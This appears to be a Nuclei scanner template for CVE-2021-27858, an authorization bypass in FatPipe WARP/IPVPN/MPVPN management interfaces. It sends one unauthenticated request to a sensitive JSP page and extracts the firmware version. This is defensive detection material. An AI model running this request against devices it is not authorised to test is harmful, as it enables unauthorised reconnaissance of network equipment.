id: CVE-2021-27858 info: name: FatPipe WARP/IPVPN/MPVPN - Authorization Bypass author: gy741 severity: medium description: | FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain a missing authorization caused by lack of access control in the web management interface, letting remote attackers access sensitive URLs, exploit requires no authentication. impact: | Unauthenticated attackers can access sensitive management interface URLs and obtain device information due to missing authorization checks. remediation: | Upgrade to FatPipe WARP/IPVPN/MPVPN version 10.1.2r60p91 or 10.2.2r42 or later. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php - https://www.fatpipeinc.com/support/advisories.php - https://www.fatpipeinc.com/support/cve-list.php - https://www.zeroscience.mk/codes/fatpipe_auth.txt classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-27858 cwe-id: CWE-862 epss-score: 0.02703 epss-percentile: 0.84001 cpe: cpe:2.3:o:fatpipeinc:warp_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fatpipeinc product: warp_firmware tags: cve,cve2021,fatpipe,auth-bypass,router,vuln http: - raw: - | GET /fpui/jsp/index.jsp HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "productType" - "type:" - "version:" - "FatPipe Networks" condition: and extractors: - type: regex part: body regex: - 'version: "([0-9.a-z]+)"' # digest: 4a0a0047304502205c19c59da6ee1a2b0ab44d3aa32d768133e30085b7555a6feb56ea0ff7fd07c3022100fec582e08a4e44a9e3be24d0b33dbccce6caafc897a00a2c6db641b2967545b8:922c64590222798bb761d5b6d8e72950